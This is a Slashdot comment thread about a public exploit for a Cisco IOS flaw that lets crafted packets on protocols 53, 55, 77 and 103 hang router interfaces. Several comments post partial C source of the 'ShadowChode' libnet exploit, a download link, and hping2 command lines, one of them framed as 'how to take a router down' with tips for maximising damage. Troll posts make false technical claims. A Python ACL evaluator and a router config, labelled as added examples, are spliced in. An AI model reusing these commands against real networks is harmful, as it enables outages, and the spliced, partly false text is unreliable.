Exploit Available for Cisco IOS Vulnerability
GNUman writes "Cisco's IOS vulnerability, posted by Slashdot and CERT, now has a published exploit available, as reported recently by CERT. While there are some articles claiming that the Internet survived a major flaw, maybe with a publicly available exploit script kiddies could start creating havoc? jerw134 wanted to start a pool to find out when the exploit would be publicly available; here's the answer."
About them Script Kiddies,
the internet's old plight.
Goin' all around,
usin' hacks they didn't write.
Them Script Kiddies lurk the net,
as devious little foes.
Keep them admins well employed,
and keeps them on their toes!
When Script Kiddies learn a trick,
it makes for one tight spot.
If you ain't patched up to date,
think again, because you ought.
How to be a Script Kiddy,
logon the net ad hoc.
Google for the hack you want,
and start your own havoc.
A programmer is a machine for converting coffee into code.
...the 'sploit is more easily available than the fix!
Anyone else gone through hell today trying to get the patch from Cisco?
Grrr... >-/
Hehe, good to see the creator gave admins plenty of time to patch / resolve problems with their Cisco gear...
If you haven't yet received notification from your NOC that they're going to be doing maintenance, you really need to impress upon them to get this fixed. In a nutshell, this flaw could allow a malicious hacker to shut down traffic to your servers.
Want to improve your Karma? Instead of "Post Anonymously", try the "Post Humously" option.
During these difficult economic times I've had to branch out and do some "web programming" along with my real programming contract work (mostly low level 4Q multi-threaded kernel hacking, etc.) and after doing some cursory studying and testing of various techniques I'm amazed at how badly most of the sites on the web are designed and how most of them use the wrong tool for the job.
For instance I was able to reduce the load time of a very well known and heavily traveled Fortune 500 website by moving all the graphics to black and white only, as they load on an average of Olog(n) faster than color graphics (where n is the number of pixels in the color graphic) thusly improving their UHCRF (unique hit customer retention factor) ratio by 35%!! I won't brag about the $10,000 bonus check I received from hitting that benchmark... heh. Other simple techniques like removing all interpreted languages (java, Visual Basic, c# etc.) and replacing them with low level compiled code (C, of course) has generated speed increases upwards of 25% and also increase the security of the site as a side effect.
It's a shame we don't teach IT people to spend some time to learn their trade inside and out instead of always forcing them to jump on the "flavour of the month" and use abstracted high level tools. As Leon Brooks sums it up in his famous book "The Mythical Man Month" - You'll never properly solve a programming problem by using tools that are not mature. Leon hit's the nail right on the head with that one.
Warmest regards,
--Jack
Wagner LLC Consulting Co. - Getting it right the first time
Now that it's been published, and Slashdot has broadcast it nice and loudly, surely the number of script kiddies planning on making use of this is significantly increasing. Not that I'm complaining about it being known - it'll really make certain people get their behinds in gear to fix it - but I'm sure we'll be seeing how serious of an exploit this is soon.
Let's see if we get significant network outages anywhere on the internet anytime in the next few days/weeks...
"You know your god is man-made when he hates all the same people you do."
Surely you meant to say Sisqo?
Sad sad troll. No friends in the world.
(For evidence of trolling, consider his use of the name "Leon Brooks" for the person actually named -- as is well known by actually competent developers -- "Frederick P. Brooks"
Ok, maybe it's just me, but why is it that I have to provide Cisco with serial number, date of purchase and the name of my cat to get this fix? I mean - the fix is software, and it will only work on Cisco units. So - for crying out loud - put the patch on an FTP site and get over with it. Jumping through hoops to get the patch isn't going to speed things up.
My employer (U.S. Gov't) is too cheap to buy Cisco equipment! =P
Fascism should more properly be called corporatism because it is the merger of state and corporate power. -- Mussolini
coincidence?
or perhaps someone in my subnet finally figured out how to mirror torrentse.cx?
They'll be creating something but I don't know what. Hopefully it won't resemble havoc.
Thanks,
--
Matt
those links just point to the advisory which has been global news for a couple of days, anyone seen the actual exploit code or is this FUD from cert ?
Once again we see the power of open source! From announced flaw to exploit in two days. Beat that Microshaft!..... Oh.... Wait.... This is not a good thing is it....
Papa Legba come and open the gate
You sir are the best troll who doesn't know he's a troll I've ever seen!!!!
1. No sig. 2. ???? 3. Profit!!!
This was seen as activity on the net last night by some of the MSS firms. It seems post-patching of the Cisco boxes results in higher CPU utilization for a good while. Not sure why yet, but maybe due to all that bad traffic...
Other simple techniques like removing all interpreted languages (java, Visual Basic, c# etc.) and replacing them with low level compiled code (C, of course) has generated speed increases upwards of 25% and also increase the security of the site as a side effect.
if you're looking for a secure web development platform, Zope is good. Only 2 vulnerabilities in 5 years, and the Hotfixes were available almost immediately; added to this, they (the 2 vulnerabilities) were only local vulnerabilities, not remotely exploitable. When the ISP I was working for was security audited, the Zope servers were among the few boxes that didn't have detectable vulnerabilities. (and these were pro network security guys). Zope's written in Python and C.
I've already compiled this and tested against an internal router, fills up the input queue quite nicely. Requires libnet.h
-orbit0r
Glad I dodged the bullet, I've got every last router patKL()*$OFD_)#@ [LINK DOWN]
Thanks heaps.
Regards,
Cisco Systems.
If I'm reading this page correctly, the protocol type of the packet that causes the problem appears to be the PIM protocol:
/etc/protocols
grep 103
pim 103 PIM # Protocol Independent Multicast
"I drank what?" -Socrates
What an insight!!!!!!
I'm sure that the coming site support teams will talk a loooong time about the _real programmer_ guy who's been there before them.... Imagine the following:
- Hey, Joe, how the hell is this page header generated.....ooooooh, an executable....Nice!!!!;o))))
You know, I should agree that the number of people in web programming that don't have a clue what exactly they're doing is significant; that doesn't mean that you should come with a kernel module every time you want to generate an xml file.....
1. No sig. 2. ???? 3. Profit!!!
Today?
RR in upstate NY has been dog-ass slow for 2 days straight now... despite the "network status" page being filled with "area down for cable maintenance/upgrades" for 3 days.
Oh look.. it says there's nothing wrong in my area.. bullshit!
No unauthorized use. Trespassers will be shot. Survivors will be shot again.
I've been searching thru the updated ios software, and the one that the advisory tells me to migrate to is way too big for my router. Plus it's not telling me whether it has 3des+ipsec support.
I don't think cisco's website is really that friendly.
you so clever!
i laugh long time!
i bet you tell that one to all you loser friends!
OMFG!
FUNNY MAN!
Importance of shaming those who published this exploit
There was very little time to act upon the new IOS version that Cisco provided to the public. The software upgrades were available to the public on Thursday morning at 00:00. CERT made their announcement about 15 minutes later. Today, the exploit is public. That is less than 48 hours to upgrade the hundreds of thousands (if not million+) Cisco routers across the world.
This is the most important security event affecting the Internet since the root DNS server attacks some time back, and this one is potentially much more severe. I have been surprised at the lack of media attention of this issue, or how some of my technical colleagues have treated it. They don't seem to understand how many Cisco routers are out there.
It needs to be shown that by making the exploit of this vulnerability public so soon, the persons who did this only did so for publicity gain at the expense of others.
They hurt others to profit themselves, and that is no more cool than slavery is. And what did they get out of it? "My dick is bigger than yours."
I just don't want this to pass over and the people who made this exploit public think that what they did was cool, or that they are going to get a lot of admiration or karma for it. If they like the Internet, which they probably do, they just did the most harmful thing to it as they could have possibly done.
Imagine your typical packet kiddie running dozens of instances of the following pseudocode on his farm of a few hundred trojaned boxes:
}
If you haven't patched already - do it now.
wahahahha
cry me a river philosophy boy
Relax. This news has been going around the various vulnerability mailing lists for over a week now. Slashdot is late to the party (rightfully so).
The discoverer notified Cisco and everyone else, but held back on the exploit code until Cisco had a chance to work on it. Now that the word is out as well as the patch, don't waste time here when you should be patching your CATs (or looking for a new job).
sheesh.
I have something in common with Stephen Hawking...
Cisco released the fix two days ago to backbone providers. Other large customers could get the fix early yesterday. If you're affected by this vulnerability and it's not fixed yet:
It seems like Cisco handled this one correctly with the providers. I'm not sure how well large customers were handled, my guess is the .edu folks probably got screwed again.
----- obSig
Quack, quack.
I just tried this on our routers at work, it does not appear to work. I did n tice som pkt lss but a r nn
Bad boys rape our young girls but Violet gives willingly.
I had the impression that routing was a fairly straight-forward task and that 100% reliable software should be available for the routers. Has Cisco added frills to such an extent that the basic routing is compromised? Is this current problem associated with unnecessary features?
You don't read a lot, do you (or don't read the correct mailing lists)? The notification regarding this exploit went out some time ago. The discoverer worked with Cisco, releasing a notification regarding the exploit and some general information regarding cause and severity.
THEY HELD BACK ON THE EXPLOIT CODE UNTIL CISCO COULD DEVISE A PATCH.
Larger customers (ISPs, etc.) were taken care of in advance of the general public notification. Independent parties were no doubt already working on their own exploit code. It's quite common to release the patch and the exploit code at the same time; in fact, some parties prefer to release 0-Day exploit code... let's just be glad these particular folks didn't.
I have something in common with Stephen Hawking...
That's less than 48 hours, depending on which timezone you live in. Should be an interesting weekend for some.
You must be a mac user...get it...CISC blow? Aww never mind...
Any good suggestions on scripting the upgrades? What happens if you have over a few hundred routers? Life sucks I guess.
Back in middle school, where they told us all, "here's exactly what drug x looks like, what it does,and how to get it & use it... but please don't use it. That would be bad!" :) aieee!
4 years later... dang! Why are all the students on crack?
Importance of shaming those who published this exploit
Why? Most ISPs are very grateful to have something to test if their countermeasures are effective.
Do you really want to upgrade all your core routers at once, and take the risk of introducing a bug which brings down your whole network? It's often better to apply some workaround and schedule an incremental update. In this case, you really want to test if your workaround is effective.
Your colleagues don't realize how many Cisco routers are out there? What, are your colleagues monkeys or something? That's like saying they didn't know how many copies of windows are running out there. Man, do I feel sorry for you. How many emails do *you* get a day that consist of "What's my password?" ?
-Looking for a job as a materials chemist or multivariat
A big middle finger to all of the idiots that don't believe in full disclosure:
Cisco IOS Exploit
You can also easily create the exploit using hping2.
Here's a link to the source in b64 format, you can extract it with:
openssl base64 -d -in cisco.txt -out cisco.tgz
Happy testing!
/* * pope1 */
or the old slashdotter up the penguin's ass
Does anyone have a windows 9x version?
Pull your head out of your ass. Cisco's already made the fixes available.
Here's the exploit: http://www.securitylab.ru/_tools/shadowchode.tar.tar
It's a .tar.gz file, incorrectly named.
:wq
You discovered the ruse. Click here to claim your prize. *
* Prize not guaranteed
Black holes are where the Matrix raised SIGFPE
The following access list is specifically designed to block attack traffic. Note that the attack traffic can include spoofed source addresses. This access list should be applied to all interfaces of the device, and should include topology-specific filters. This could include filtering routing protocol traffic, management protocols, and traffic destined for the internal network. Protocol 103 is Protocol Independent Multicast (PIM), which is a commonly deployed application in multicast networks.
Interfaces with PIM enabled have not been found to be vulnerable to exploit traffic with protocol 103; PIM traffic may be permitted to those select devices.
access-list 101 deny 53 any any
access-list 101 deny 55 any any
access-list 101 deny 77 any any
access-list 101 deny 103 any any
!--- insert any other previously applied ACL entries here
!--- you must permit other protocols through to allow normal
!--- traffic -- previously defined permit lists will work
!--- or you may use the permit ip any any shown here
access-list 101 permit ip any any
= Grow a brain...
Bloat like a buggerfly, stink like a Klee!
Pleeeeeease?!!!!
In the cisco workaround they say to deny 53 any any.
Now wouldnt that block all incoming and outgoing DNS lookups?
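The workaround ACL quoted earlier in the thread is a first-match list with an implicit deny at the end, and the question about `deny 53 any any` is worth working through: that entry matches IP protocol 53 (SWIPE), not DNS, which is UDP or TCP port 53 carried inside IP protocol 17 or 6. The evaluator below is an added example, not Cisco's code and not anything posted in this thread. It parses the advisory's `access-list 101` lines, adds `host` entries to model the PIM exception the advisory describes, and runs constructed sample packets through both lists. The address 192.0.2.1, the sample packets and the PIM-exception list itself are assumptions.

```python
"""Evaluate an IOS-style numbered extended ACL against sample packets.

Added example: models the first-match semantics and the implicit deny of a
Cisco IOS access list. Not Cisco's code; packets, addresses and the
PIM-exception list are constructed for illustration.
"""
from dataclasses import dataclass
from ipaddress import ip_address
from typing import List, Optional

# IANA / /etc/protocols names for the four IP protocols the workaround blocks.
# 53 is SWIPE, an IP-layer protocol, NOT DNS: DNS runs over UDP/TCP port 53.
PROTO_NAMES = {53: "SWIPE", 55: "MOBILE", 77: "SUN-ND", 103: "PIM"}
TCP, UDP = 6, 17

# The workaround ACL as published in the advisory text quoted in the thread.
WORKAROUND_ACL = """
access-list 101 deny 53 any any
access-list 101 deny 55 any any
access-list 101 deny 77 any any
access-list 101 deny 103 any any
!--- insert any other previously applied ACL entries here
access-list 101 permit ip any any
"""

# Constructed variant for a PIM-enabled router (192.0.2.1 is an assumed address):
# permit PIM to that one device first, then deny protocol 103 to everything else.
PIM_EXCEPTION_ACL = """
access-list 101 permit 103 any host 192.0.2.1
access-list 101 deny 53 any any
access-list 101 deny 55 any any
access-list 101 deny 77 any any
access-list 101 deny 103 any any
access-list 101 permit ip any any
"""

@dataclass(frozen=True)
class Packet:
    proto: int                  # IP protocol number
    src: str
    dst: str
    dport: Optional[int] = None  # transport port, only meaningful for TCP/UDP

@dataclass(frozen=True)
class AclEntry:
    action: str   # "permit" or "deny"
    proto: str    # "ip" or a protocol number as a string
    src: str      # "any" or a host address
    dst: str      # "any" or a host address

def _take_addr(tokens: List[str], i: int):
    """Consume one address spec ('any' or 'host A.B.C.D'); return (spec, next index)."""
    if tokens[i] == "any":
        return "any", i + 1
    if tokens[i] == "host":
        return tokens[i + 1], i + 2
    raise ValueError(f"unsupported address spec: {tokens[i]}")

def parse_acl(text: str) -> List[AclEntry]:
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("!"):   # IOS comment lines start with '!'
            continue
        t = line.split()
        if t[0] != "access-list" or t[2] not in ("permit", "deny"):
            raise ValueError(f"unsupported line: {line}")
        src, i = _take_addr(t, 4)
        dst, _ = _take_addr(t, i)
        entries.append(AclEntry(t[2], t[3], src, dst))
    return entries

def _addr_matches(spec: str, addr: str) -> bool:
    return spec == "any" or ip_address(spec) == ip_address(addr)

def evaluate(acl: List[AclEntry], pkt: Packet) -> str:
    """Return the action of the first matching entry; IOS appends an implicit deny."""
    for e in acl:
        if e.proto != "ip" and int(e.proto) != pkt.proto:
            continue
        if _addr_matches(e.src, pkt.src) and _addr_matches(e.dst, pkt.dst):
            return e.action
    return "deny"

def describe(pkt: Packet) -> str:
    name = PROTO_NAMES.get(pkt.proto, {TCP: "TCP", UDP: "UDP"}.get(pkt.proto, str(pkt.proto)))
    port = f" port {pkt.dport}" if pkt.dport is not None else ""
    return f"{name}{port} {pkt.src} -> {pkt.dst}"

if __name__ == "__main__":
    samples = [
        Packet(103, "198.51.100.7", "192.0.2.1"),       # protocol 103 towards the router
        Packet(UDP, "198.51.100.7", "192.0.2.1", 53),   # ordinary DNS query: IP protocol 17
        Packet(TCP, "198.51.100.7", "192.0.2.1", 22),
    ]
    for label, text in (("workaround", WORKAROUND_ACL), ("pim-exception", PIM_EXCEPTION_ACL)):
        acl = parse_acl(text)
        for p in samples:
            print(f"{label:14} {evaluate(acl, p):6} {describe(p)}")
```

Running it shows the DNS and SSH packets permitted by both lists, the protocol 103 packet denied by the plain workaround, and permitted only to the one assumed PIM-enabled address in the variant; anything not matched by any line falls to the implicit deny, which is why the advisory's trailing `permit ip any any` (or your existing permit lines) matters.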
As I mentioned in your other post about this, this is *not* the CatOS patch. Cisco discovered this themselves. The discoverers did have to work with Cisco, since they were Cisco.
No one outside Cisco had seen this until a few days ago. The problem is, once Cisco announced it, there were only so many combinations that could cause the problems they were mentioning, and someone found them, and posted it to Full-Disclosure.
With respect, you're partially right, but only partially, and the half-accurate stance you suggest is both attractive and dangerous.
From a moral and ethical standpoint, yes, many exploit postings are done for bad reasons - to garner street cred, create havoc, etc. (Of course, some are posted to force an issue, or as a necessary part of getting information to those who need it to fix their systems, but that argument can be found in plenty of other places, so no need to rehash it here.)
The thing to remember: from a practical standpoint, none of that matters one #$@% bit. Sure, it would be nice if "they" could be restrained by shame or any number of other things; it would also be nice if everyone's intelligence doubled every year. Bets, anyone?
What's important is dealing with the results, not wishing for stuff that would be nice but is highly unlikely to ever happen. When flaw n shows up, we need to fix it or mitigate it as well as we can. Hopefully we can even learn from the flaw, and avoid similar ones in the future. Or, if we can't avoid getting nailed, we go with a fallback plan. ('Course, if things go badly enough, the only backup plan may be "Make your peace with $ENV{DEITY} && die();" but that's a separate issue. :) )
I'm not saying that shaming a malefactor is a bad thing - if it improves the state of the world, great. However, it won't solve the immediate problem unless you can do it for every case, so for purposes of safety you might as well put effort into something that will actually help. When we're defending systems, we need to assume that attackers will do their worst, then plan and act accordingly. Avoiding a hole in our armor, or patching one when we find out about it, is much more logical than trying to get people to keep quiet about it.
As mentioned, needs libnet.
/* OH WAIT, ROUTE'S RESOLVER DOESN'T WORK! */
/* Mmmmm, suck up random amount of memory! */
padding for the lame filter
/**
* ShadowChode - 0daze b0mb th4 fUq 0uT uV m0zT aNy c1sK0 r0ut3rz!@#
*
* Ping target router/switch for TTL to host. Subtract that number from 255
* and use that TTL on the command line. The TTL must equal 0 or 1 when it
* reaches the target. The target must accept packets to the given target
* interface address and there are some other caveats.
*
* BROUGHT TO YOU BY THE LETTERS C AND D
*
* [L0cK]
*/
#include <stdio.h>
#include <sys/types.h>
#include "libnet.h"
#define MIN_PAYLOAD_LEN (26)
#define CLEANUP { \
libnet_destroy(lh); \
free(payload); \
}
int
main(int argc, char *argv[])
{
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *lh;
u_long dst_addr;
int ttl;
int payload_len;
char *payload;
libnet_ptag_t data_tag;
libnet_ptag_t ip_tag;
int i;
int len;
int protocols[] = { 53, 55, 77, 103 };
struct libnet_stats ls;
lh = libnet_init(LIBNET_RAW4, NULL, errbuf);
if (lh == NULL) {
(void) fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(-1);
}
if (argc != 3 || (dst_addr = libnet_name2addr4(lh, argv[1], LIBNET_RESOLVE) == -1)) {
(void) fprintf(stderr, "Usage: %s <target> <ttl>\n", argv[0]);
libnet_destroy(lh);
exit(-1);
}
{
struct in_addr dst;
if (!inet_aton(argv[1], &dst)) {
perror("inet_aton");
libnet_destroy(lh);
exit(-1);
}
dst_addr = dst.s_addr;
}
ttl = atoi(argv[2]);
libnet_seed_prand(lh);
len = libnet_get_prand(LIBNET_PR8);
payload_len = (MIN_PAYLOAD_LEN > len) ? MIN_PAYLOAD_LEN : len;
payload = (char *) malloc(payload_len);
if (payload == NULL) {
perror("malloc");
libnet_destroy(lh);
exit(-1);
}
for (i = 0; i < payload_len; i++) {
payload[i] = i;
}
data_tag = LIBNET_PTAG_INITIALIZER;
data_tag = libnet_build_data(payload, payload_len, lh, data_tag);
I just realized I made a small error in the above pseudocode. If you successfully hang closer routers you won't have connectivity to more distant ones, so distant routers should be tried first. If the for loop is changed to read for $hopnum ($#hops..5), the effect is much greater assuming an equal number of vulnerable routers.
Patch your vulnerable Cisco gear ASAP!
Without full disclosure, what % of the routers out there would be patched right now? 10? Maybe.
It sounds to me like Cisco needs to get their genius engineers together to come up with a better way to distribute IOS images - one that does not involve e-mail, perhaps!
What the people did _was_ cool. They contacted Cisco a while back. Then they released the exploit almost *2 days* after the patch was announced.
Nice try bringing slavery into this. That's ridiculous.
"most harmful thing to it they could have possibly done." Please. Even if they released it 2 seconds before the patch was available, the Internet may have had instability for a day or two while Cisco ships out CDRs to everyone so they can fix it.
To those that choose full disclosure for security - I applaud you! I really appreciate having a program available that allows me to test if my systems are vulnerable and remain vulnerable post-patching.
> I just don't want this to pass over and the
> people who made this exploit public think that
> what they did was cool, or that they are going
> to get a lot of admiration or karma for it. If
> they like the Internet, which they probably
> do, they just did the most harmful thing to it
> as they could have possibly done.
Wrong.
Whatever happened to the principle of accountability? If Cisco created this bug, it must be held accountable for its effects.
I hold just about every technical Cisco certification save for the CCIE Security cert, and I believe it's important for vulnerabilities to be brought to the public domain. If not, we shield the manufacturers and those liable for the bug from their natural responsibilities and accountability. What would be the impetus for Cisco to patch their code quickly if they could rest on the complacency of knowing their flaws could be swept under the rug?
Do you want to know why Cisco patched their code so quickly? Because they were afraid. They have a reputation to maintain as a premier provider of networking solutions. They know there are plenty of script kiddies and network security professionals alike that would have learned this exploit sooner or later. Better to come public (even without exploit details) than to have someone with libnet and a sniffer surreptitiously discover this bug and use it maliciously well before anyone could take protective measures. If Cisco boxes get pummelled out in the field, then so be it. It will be that much less likely to happen in the future. The best remembered lessons are those learned the hard way.
So I congratulate Cisco for being upfront and showing all their cards to their customers. Their integrity will be rewarded for it.
However, I also congratulate those who published the exploit for keeping manufacturers like Cisco honest and forcing the industry to "keep the bar high". It benefits everybody and helps to ensure a more secure internet after the fact.
The script kiddie should have include(d) for the *alloc functions. The malloc cast is unnecessary and wrong by ANSI-C standard. He casts fprintf void which means he's explicitly discarding the return, which is confusing. He never checks return values on a lot of the libnet functions. What if they fail?
Bad script kiddie; no props for you.
shadowchode.tar.gz
la la la la laaaaaaaaaaaaaaa
I am not against making the exploit public at all -- just not within the first few days of the exploit discovery. Considering the quantity of systems affected and the fact that many Cisco devices are remote makes patching difficult.
Personally, I want to throw the exploit against some of my own equipment just for fun too.
There will be Cisco devices vulnerable to this exploit for years to come. As a consultant, I commonly come across old Cisco routers that have not had their software upgraded in years. Not every sysadmin knows how to deal with a Cisco -- they just pass traffic through it.
There'd been a bunch of stuff going around on FD about it that I was under the impression that the two subjects were related since the effect was largely the same (send specially-crafted packets, port fills up, shuts down, requires reboot of switch).
I still say the release of exploit code is no big deal in this case. As you said, the combos were limited, so anyone with half a clue could figure it out without someone releasing code.
I have something in common with Stephen Hawking...
I like full disclosure -- just not within 48 hours of such a major vulnerability.
Almost two days is not sufficient time given the quantity of systems that this problem affects and the severity of the problem.
Twisting around and bending backwards like that to kiss your own Ass ?
Maybe next week uncle Billy Bob will come here with his own sore back and brag about how he removed your C code in favor asm code to get a cool 30% increase in speed.
But of course we all know that EASE of updating and cutting edge tech just went out the window......
If you look at the IOS builds that have the fix in them they are from about 10 weeks ago. In some cases there are 2 8-week incremental builds of a major IOS branch that aren't vulnerable.
Most likely they alerted certain government agencies after posting the fix, and waited for an all-clear before they publicly announced it. If you happened to use a recent IOS you were already fine - unfortunately updating IOSs is often more dangerous than not, so most people will be running older IOS unless notified.
and shoving it up my ass that it's easier to crawl out of bed in the morning.
I think your sig should be "Thomas J. Advertisement interim CEO/Founder/Shameless Slashdot Shill - Melior, Inc."
LOL, at least I sign and stand for what I say...
Seriously, though, would you not agree that the benefit of getting the word out outweighs the risk of getting flames, such as yours?
Thomas J. Ackermann interim CEO/Founder - Melior, Inc. iSecure - CyberWarfare Defense www.dDos.com thomas@ddos.com
Right now my post is +1 Funny and your post is -1 Troll. So much for getting the word out.
For those of you who are attempt to workaround this, and happen to have hping2, here's how to do it. To get the TTL, just ping the destination and subtract from 255, for instance a ping with TTL 251, you'd enter 4. Choose which protocol to use of the four.
/dev/urandom
hping2 (dest ip) -0 -t (ttl from above) -H (53,55,77, 103) -d 128 -E
If an e-mail contains the sentence "this is not spam", my spam-filter automatically cans it. And in 99.9999% of these cases my filter's decision turns out to be right.
If in a conversation, somebody says "I don't like to criticise you, but...", expect that follows a criticism of you.
If a car mechanic tells you "trust me, I'll have your car ready by next Wednesday, no problem!", you can be sure that it won't be ready.
Likewise, if a slashdot post says "I don't troll", the smart moderator moderates accordingly...
The CatOS bug only kills management traffic to the router - telnet, ssh, http, etc. Traffic going *through* the router remains unaffected.
The IOS bug causes the affected interface to drop all incoming traffic, management or production.
Now it's possible that a common bug could have caused both, and it's also possible that the CatOS bug prompted Cisco to take a closer look at the IOS code and led to the discovery of this one. But by all accounts, the IOS bug was discovered internally by Cisco engineers. The exploit was found by someone else after the vulnerability was announced.
Shiggity shiggity shwa!
Here's how to take a router down:
/dev/urandom
Assuming you're using debian.
apt-get install hping2
ping
Subtract x in ttl=x from 255
then run:
hping2 -t -H 55 -d 128 -E
enjoy...
and remember.. if you take down your ISPs gateway first you won't be able to do further damage.. start from the outside in.
If you look at the release dates of some of the code that is not vulnerable to this attack, it goes back to early June. To me, it looks like this was identified almost two months ago. The question then is: Was this suddenly announced once a planned mile-marker in IOS revisions had been met....or once they suspected the exploit was in the wild?
That is less than 48 hours to upgrade the hundreds of thousands (if not million+) Cisco routers across the world.
So do them in parallel.
Hell, give me access. I'll upgrade a few million routers in less than 48 hours, no prob.
And I am a lazy pothead sys admin. I don't even work on routers.
From the posted source, you shouldn't have it anyway. Now, go away.
How is this a big middle finger to people that don't believe full disclosure is a good idea for something of this gravity? Major ISPs and major providers (for which I work) didn't hear about this but 48 hours before the exploit was made public.
Cisco tried their hardest to prevent info from getting out to make it easy to create an exploit, but data was leaked. What has this done? It's left hundreds of thousands to millions of routers, with not nearly enough admins to patch, vulnerable to the losers who have already posted (in reply to your message no less) "Is there a win9x version?". What do you think HE is going to do with it? Test his network? Hah!
I believe in full disclosure, and I wish that I had been more in the know during this process, but I have to ask myself why? I wanted to be more in the know so that I could feel more important than other people. Boy, that's selfish. Maybe you should consider that there are more important things than getting a 'sploit -- like giving the INTERNET an opportunity to respond to a major threat.
That, or you could be segmented from your favorite pr0n site. Your choice.
here
"I'm going to say an exploit by tomorrow. End of the internet by Sat. All back to normal on Monday"
Rus
Cheap UK and US VPS
worked against my 1005.. sadly :P)
As I first saw this, and figured you'd mis-spelled 10053, because there really SHOULD be an "e" at the end... Then realized that "loose" doesn't fit in the sentence.
Ah well. Stupid me.
-Ben
I have no problem with your religion until you decide it's reason to deprive others of the truth.
So far it has been 4 hours since my e-mail... no response whatsoever
Lemme guess.
Your request for help to cisco.com is not really going to go to 198.133.219.25 but to, uhm, a new different, uh, help center, that will be happy to send you an IOS sploit^H^H^H^H^H^H update to have you up and going in a jiffy.
"Provided by the management for your protection."
You serious? Sure, go nuts. I look forward to seeing what happens when the build you pick for a router three hops down doesn't support the STM-4 card you had in there, and stops you reaching the 20 networks behind it. Oh, and there's one over here that's running a new build with a BGP bug, so these 100 have fallen off the network. And three of these six in New York just plain didn't come back, we're not sure why yet. You've got out of band access to them all, right? right?
Upgrade with care. Even the most reliable kit develops problems a small percentage of the time; a small percentage of a lot of kit is a lot of kit.
Dave
What incentive would we have to defend ourselves if we didn't have predators to threaten us?
Sounds like smarter living through adoption of stupidity, and a long way around the block if you ask me.
Maybe corporations need to think a little longer and a little harder before they downsize their IT staff? :)
It's a real good thing that this one can be fixed with an access list, because what CISCO *doesn't* mention when they so "responsibly" provide upgraded IOS versions is that they are not going to provide fixes for versions they consider obsolete... and the ones they do provide will not fit into the flash or RAM available on a lot of routers out there. If it were not for the access-list workaround several people would be left naked with no shelter on this one until they buy new hardware.
Not to mention the fact that it is often the case that you can buy a router from CISCO and, when you buy it, buy the maximum amount of flash and RAM available for that model, and *still* find that by the time you receive the product, the latest IOS version requires more than you have. We've even had situations where the amount of flash to run a current IOS on a particular chassis was not even available for the chassis when we ordered the router. (Stuff like this doesn't happen so much in the low-end/CPE market but for core routers it happens all the time.)
CISCO isn't the only one but this is completely inconsiderate if not intentional (and possibly criminal). It simply is not possible, even in a cluster-f**k huge corporation, for this type of mistake to be made over and over and over without someone from hardware correctly anticipating the size and footprint of IOS to offer a product that doesn't need a hardware upgrade every single year.
you're a dork.
Get a life. You've never seen a cisco in your life.
I was contacted last night by UUnet, and tonight they are adding ACLs to all of my edge routers.
:) I love outsourcing.
Myself, I'm drinking a beer.
Ingress filtering on a Cisco via ACLs is only effective on the 75xx class routers.
On other Cisco IOS products, the input queue processing precedes the ACL processing, so these devices can be DoS'd no matter what ACLs are in place.
Well, I would hope that if one is running a shop with a large quantity of Cisco boxes, one would have taken the necessary time to lock down these boxes to prevent unnecessary access to them. Whether it means setting up ACLs at the edge of your network to prevent bogus/unauthorized access to the devices/interfaces, or ACLs on the boxen themselves, this should have been done a long time ago. Granted, you don't want excessive (or any, for that matter) ACLs on your core router. A good engineer, IMNSHO, would have limited the protocols/sources accepted by critical pieces of infrastructure. ;-)
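The access-list workaround mentioned above, and the "lock down who may talk to the box itself" approach in this reply, both boil down to the same pattern: an inbound ACL on every untrusted-facing interface that permits only known management sources to the router's own addresses, drops everything else addressed to the router, and leaves transit traffic alone. The configuration below is an added illustration of that pattern, written for this page; it is not any poster's config and not Cisco's published workaround. All addresses are constructed from the RFC 5737 documentation ranges, and the interface names, ACL name and management host are placeholders.

```cisco
! Constructed example: protect the router's own addresses, not transit.
! Assumed router addresses: Loopback0 203.0.113.1, Serial0/0 198.51.100.1
! Assumed management host (NMS / jump box): 192.0.2.10
!
ip access-list extended PROTECT-ROUTER
 ! Management traffic from the trusted host to the router itself.
 permit tcp host 192.0.2.10 host 203.0.113.1 eq 22
 permit udp host 192.0.2.10 host 203.0.113.1 eq snmp
 ! Anything else aimed at any of the router's own addresses is dropped.
 ! Every address the router answers on must be listed, loopbacks included.
 deny   ip any host 203.0.113.1
 deny   ip any host 198.51.100.1
 ! Traffic passing through the router is unaffected.
 permit ip any any
!
! Apply inbound on every interface that faces a network you do not control.
interface Serial0/0
 ip access-group PROTECT-ROUTER in
!
! Watch the hit counters to confirm the deny lines are doing the work:
!   show ip access-lists PROTECT-ROUTER
```

Two caveats that follow from the thread itself: the poster above notes that on some platforms input-queue handling happens before ACL evaluation, so verify on each hardware class that the ACL actually protects the receive path rather than assuming it does; and an ACL like this only covers addresses you remembered to list, so it has to be regenerated whenever a loopback or interface address changes.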
As an aside, what is a good time to release the exploit into the wild? What if the exploit was exploited _prior_ to Cisco getting the word out on the recommended fix? Would you have preferred 72 hours, or maybe after you returned from your summer vacation?
The truth of the matter is that Cisco is not the only network equipment maker out there. And there's a good chance that a lot of routing code that IS out there is shared by several different vendors' equipment. How could makers of non-Cisco equipment test their equipment to ensure that it doesn't suffer the same flaw without any specific details and without an exploit? How could customers who own non-Cisco equipment be sure that their networks are safe?
Despite what EULAs say, most software is sold, not licensed.
I work for a very big ISP.
Our chief security officer was urging people to soft-peddle the vulnerability and our response to it, because it was very difficult to exploit, and an exploit wouldn't be widely available for weeks.
The presence of the exploit and its successful deployment against sacrificial goat networks shut him up.
sounds like you are a jerk. what was that all about?
crap crap and crap
if this patch is so important, then you act on it straight away.... even 24 hours is enough!
BUT if you've read the vulnerability info, and looked at the exploit, you'd see that this issue isn't as bad as it seems.
Bob Brooks (dear old Dad) has made significant contributions in the Australian mining industry, his twin Colin Brooks is a well-known consulting geologist, their brother Don Brooks runs Harvestaire, and grandpa Charles Alfred Brooks made himself famous for finding things out about sports that helped people to do them better, but yes, the man you really want is Fred Brooks, famous for statements like "adding manpower to a late project makes it later".
:-)
My main claim to fame seems to be for abusing people in public (-: For which I am indebted to several skilled exemplars, who probably all know who they are
Kudos to Russel Steicke for pointing out this post to me.
Got time? Spend some of it coding or testing
